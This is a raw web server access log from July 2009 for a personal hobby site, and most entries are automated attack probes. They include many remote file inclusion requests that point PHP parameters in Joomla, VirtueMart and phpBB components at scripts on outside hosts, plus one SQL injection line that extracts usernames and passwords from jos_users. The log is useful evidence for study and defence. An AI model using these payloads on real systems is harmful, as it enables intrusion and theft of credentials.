64.71.148.162 - - [26/Jul/2009:09:01:18 -0700] "GET /logs/access_080516.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.throughsearch.com/.core/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.87.105 - - [26/Jul/2009:09:02:11 -0700] "GET /logs/access_080908.log HTTP/1.0" 200 3933556 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
190.144.44.36 - - [26/Jul/2009:09:02:17 -0700] "GET /logs/access_090101.log%20%20/content.php?seite=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [26/Jul/2009:09:02:17 -0700] "GET /logs/access_080717.log%20%20/content.php?seite=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.255.156.44 - - [26/Jul/2009:09:02:56 -0700] "GET /logs/access_090707.log/index.php?option=com_portfol&Itemid=814&task=viewcategory&vcatid=-96+union+select+concat(username,char(58),password)KHG+from+jos_users-- HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.41 - - [26/Jul/2009:09:02:56 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.71.148.162 - - [26/Jul/2009:09:03:01 -0700] "GET /logs/access_080726.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.throughsearch.com/.core/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.71.148.162 - - [26/Jul/2009:09:03:01 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.throughsearch.com/.core/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.71.148.162 - - [26/Jul/2009:09:03:01 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.throughsearch.com/.core/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.33.230 - - [26/Jul/2009:09:03:09 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.255.156.44 - - [26/Jul/2009:09:03:11 -0700] "GET /index.php?option=com_portfol&Itemid=814&task=viewcategory&vcatid=-96+union+select+concat(username,char(58),password)KHG+from+jos_users-- HTTP/1.1" 200 21088 "-" "libwww-perl/5.805" "www.dmulk.com"
64.71.148.162 - - [26/Jul/2009:09:03:19 -0700] "GET /logs/access_080501.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.throughsearch.com/.core/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.231.97 - - [26/Jul/2009:09:03:37 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/4.0" "www.dmulk.com"
65.55.231.97 - - [26/Jul/2009:09:03:41 -0700] "GET /bikes/dteel/2008_09_13/IMG_5191.JPG HTTP/1.1" 200 3944286 "-" "Mozilla/4.0" "www.dmulk.com"
65.55.231.97 - - [26/Jul/2009:09:03:43 -0700] "GET /bikes/dteel/2008_09_13/ HTTP/1.1" 200 1694 "-" "Mozilla/4.0" "www.dmulk.com"
80.152.243.103 - - [26/Jul/2009:09:03:52 -0700] "GET /logs/access_090520.log%20%20//shop/main.php?_shop_path=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.24 - - [26/Jul/2009:09:04:39 -0700] "GET /logs/access_080126.log//config.inc.php?mosConfig_absolute_path=http://manageaproject.com/custom-tailor/2007/06/07/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.24 - - [26/Jul/2009:09:04:39 -0700] "GET /logs/access_080502.log//config.inc.php?mosConfig_absolute_path=http://manageaproject.com/custom-tailor/2007/06/07/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.24 - - [26/Jul/2009:09:04:39 -0700] "GET /logs//config.inc.php?mosConfig_absolute_path=http://manageaproject.com/custom-tailor/2007/06/07/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.24 - - [26/Jul/2009:09:04:39 -0700] "GET /config.inc.php?mosConfig_absolute_path=http://manageaproject.com/custom-tailor/2007/06/07/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.152.243.103 - - [26/Jul/2009:09:04:47 -0700] "GET /logs/access_090318.log%20%20//shop/main.php?_shop_path=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:05:16 -0700] "GET /quick_reply.php?phpbb_root_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:05:16 -0700] "GET /logs/access_081218.log//quick_reply.php?phpbb_root_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:05:16 -0700] "GET /logs//quick_reply.php?phpbb_root_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.71.148.162 - - [26/Jul/2009:09:05:18 -0700] "GET /logs/access_080516.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.throughsearch.com/.core/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
90.156.153.166 - - [26/Jul/2009:09:05:26 -0700] "GET /logs/access_080313.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://bruntil.com/cgi/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
213.171.225.234 - - [26/Jul/2009:09:06:16 -0700] "GET /logs/access_080201.log//administrator/components/com_virtuemart/export.php?http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.171.225.234 - - [26/Jul/2009:09:06:16 -0700] "GET /administrator/components/com_virtuemart/export.php?http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.171.225.234 - - [26/Jul/2009:09:06:17 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.147.72.145 - - [26/Jul/2009:09:06:37 -0700] "GET /logs/access_081026.log////?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
77.221.130.13 - - [26/Jul/2009:09:06:37 -0700] "GET /logs/access_081026.log////?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
63.147.72.145 - - [26/Jul/2009:09:06:38 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 200 21040 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
77.221.130.13 - - [26/Jul/2009:09:06:38 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 200 21040 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
63.147.72.145 - - [26/Jul/2009:09:06:39 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 200 110062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
77.221.130.13 - - [26/Jul/2009:09:06:39 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 200 110062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
77.221.130.27 - - [26/Jul/2009:09:06:40 -0700] "GET /logs/access_081026.log////?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
77.221.130.27 - - [26/Jul/2009:09:06:41 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 200 110062 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
77.221.130.27 - - [26/Jul/2009:09:06:41 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 200 21040 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
77.221.130.8 - - [26/Jul/2009:09:06:41 -0700] "GET /logs/access_081026.log////?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
77.221.130.8 - - [26/Jul/2009:09:06:41 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 200 110062 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
77.221.130.8 - - [26/Jul/2009:09:06:42 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 200 21040 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
216.137.102.177 - - [26/Jul/2009:09:06:50 -0700] "GET /logs/access_090415.log//////shop/main.php?_shop_path=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.137.102.177 - - [26/Jul/2009:09:06:50 -0700] "GET /logs/access_090627.log//////shop/main.php?_shop_path=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.27 - - [26/Jul/2009:09:07:13 -0700] "GET /logs/access_080615.log////?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
77.221.130.8 - - [26/Jul/2009:09:07:14 -0700] "GET /logs/access_080615.log////?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
77.221.130.13 - - [26/Jul/2009:09:07:16 -0700] "GET /logs/access_080615.log////?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
125.248.88.155 - - [26/Jul/2009:09:07:28 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.248.88.155 - - [26/Jul/2009:09:07:28 -0700] "GET /logs/access_081115.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.248.88.155 - - [26/Jul/2009:09:07:29 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.147.72.145 - - [26/Jul/2009:09:07:36 -0700] "GET /logs/access_080615.log////?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
125.248.88.155 - - [26/Jul/2009:09:07:39 -0700] "GET /logs/access_090123.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.24 - - [26/Jul/2009:09:08:09 -0700] "GET /logs/access_080126.log%20%20//config.inc.php?mosConfig_absolute_path=http://manageaproject.com/custom-tailor/2007/06/07/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:08:15 -0700] "GET /quick_reply.php?phpbb_root_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:08:15 -0700] "GET /logs//quick_reply.php?phpbb_root_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [26/Jul/2009:09:08:15 -0700] "GET /logs/access_081218.log//quick_reply.php?phpbb_root_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.117.85.108 - - [26/Jul/2009:09:08:39 -0700] "GET /logs/access_081026.log////?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
217.117.85.108 - - [26/Jul/2009:09:08:39 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 200 21040 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
217.117.85.108 - - [26/Jul/2009:09:08:39 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 200 110062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
211.110.19.24 - - [26/Jul/2009:09:08:42 -0700] "GET /logs/access_080502.log%20%20//config.inc.php?mosConfig_absolute_path=http://manageaproject.com/custom-tailor/2007/06/07/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.248.88.155 - - [26/Jul/2009:09:08:54 -0700] "GET /logs/access_081115.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:09:08:54 -0700] "GET /logs/access_080623.log/index.php?custompages=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:09:08:56 -0700] "GET /logs/index.php?custompages=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
125.248.88.155 - - [26/Jul/2009:09:08:58 -0700] "GET /logs/access_090123.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [26/Jul/2009:09:09:00 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:09:09:14 -0700] "GET /index.php?custompages=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 200 20997 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
202.125.45.45 - - [26/Jul/2009:09:09:27 -0700] "GET /logs/access_080315.log/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.45.45 - - [26/Jul/2009:09:09:27 -0700] "GET /index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.45.45 - - [26/Jul/2009:09:09:27 -0700] "GET /logs/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.45.45 - - [26/Jul/2009:09:09:35 -0700] "GET /logs/access_080207.log/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.234.7.92 - - [26/Jul/2009:09:09:59 -0700] "GET /logs/access_090119.log/index.php?custompages=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
217.117.85.108 - - [26/Jul/2009:09:11:09 -0700] "GET /logs/access_080615.log////?_SERVER[DOCUMENT_ROOT]=http://www.ohid.se/image?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:09:11:46 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:09:11:46 -0700] "GET /logs/access_080726.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:09:11:46 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:09:11:46 -0700] "GET /logs/access_080627.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [26/Jul/2009:09:11:47 -0700] "GET /logs/access_080516.log//administrator/components/com_virtuemart/export.php?http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.248.88.155 - - [26/Jul/2009:09:14:10 -0700] "GET /logs/access_080314.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.248.88.155 - - [26/Jul/2009:09:14:14 -0700] "GET /logs/access_080506.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.177.55 - - [26/Jul/2009:09:15:10 -0700] "GET /logs/access_081123.log//?path%5Bdocroot%5D=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.177.55 - - [26/Jul/2009:09:15:10 -0700] "GET /logs//?path%5Bdocroot%5D=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 200 110060 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.177.55 - - [26/Jul/2009:09:15:11 -0700] "GET /?path%5Bdocroot%5D=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 200 21127 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:09:16:13 -0700] "GET /logs/access_080726.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:09:16:14 -0700] "GET /logs/access_080627.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.191.35.118 - - [26/Jul/2009:09:16:35 -0700] "GET /logs/access_080313.log//include/write.php?dir=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.177.55 - - [26/Jul/2009:09:17:03 -0700] "GET /logs/access_081123.log%20%20//?path%5Bdocroot%5D=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.248.88.155 - - [26/Jul/2009:09:17:08 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.177.55 - - [26/Jul/2009:09:17:12 -0700] "GET /logs/access_080410.log%20%20//?path%5Bdocroot%5D=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.87.105 - - [26/Jul/2009:09:18:10 -0700] "GET /bikes/dteel/CreSTOC09/?M=D HTTP/1.0" 200 3481 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:18:31 -0700] "GET /logs///index.php?cmd&file=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:18:31 -0700] "GET /logs/access_081206.log///index.php?cmd&file=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:18:31 -0700] "GET /logs/access_081204.log///index.php?cmd&file=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:18:31 -0700] "GET /logs///index.php?cmd&file=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:18:31 -0700] "GET /logs/access_081206.log///index.php?cmd&file=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:18:31 -0700] "GET /logs/access_081204.log///index.php?cmd&file=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [26/Jul/2009:09:18:34 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [26/Jul/2009:09:18:34 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:18:37 -0700] "GET /logs///index.php?cmd&file=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:18:38 -0700] "GET /logs/access_081206.log///index.php?cmd&file=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:18:38 -0700] "GET /logs///index.php?cmd&file=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:18:38 -0700] "GET /logs/access_081206.log///index.php?cmd&file=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:18:38 -0700] "GET /logs/access_081204.log///index.php?cmd&file=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:18:38 -0700] "GET /logs/access_081204.log///index.php?cmd&file=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [26/Jul/2009:09:18:39 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [26/Jul/2009:09:18:39 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:18:43 -0700] "GET /logs/access_081206.log%20%20///index.php?cmd&file=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:18:43 -0700] "GET /logs///index.php?cmd&file=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:18:44 -0700] "GET /logs/access_090215.log%20%20///index.php?cmd&file=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:18:46 -0700] "GET /logs///index.php?cmd&file=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:18:46 -0700] "GET /logs/access_081206.log%20%20///index.php?cmd&file=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:18:46 -0700] "GET /logs/access_090215.log%20%20///index.php?cmd&file=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:18:55 -0700] "GET //index.php?cmd&file=http://aboutav.com//id1.txt??? HTTP/1.1" 200 20995 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:18:55 -0700] "GET //index.php?cmd&file=http://aboutav.com//id1.txt??? HTTP/1.1" 200 20995 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [26/Jul/2009:09:18:55 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:19:00 -0700] "GET //index.php?cmd&file=http://aboutav.com//id1.txt??? HTTP/1.1" 200 20995 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [26/Jul/2009:09:19:01 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:19:02 -0700] "GET //index.php?cmd&file=http://aboutav.com//id1.txt??? HTTP/1.1" 200 20995 "-" "Mozilla/5.0" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:19:10 -0700] "GET //index.php?cmd&file=http://aboutav.com//id1.txt??? HTTP/1.0" 200 20979 "-" "Mozilla/5.0" "www.dmulk.com"
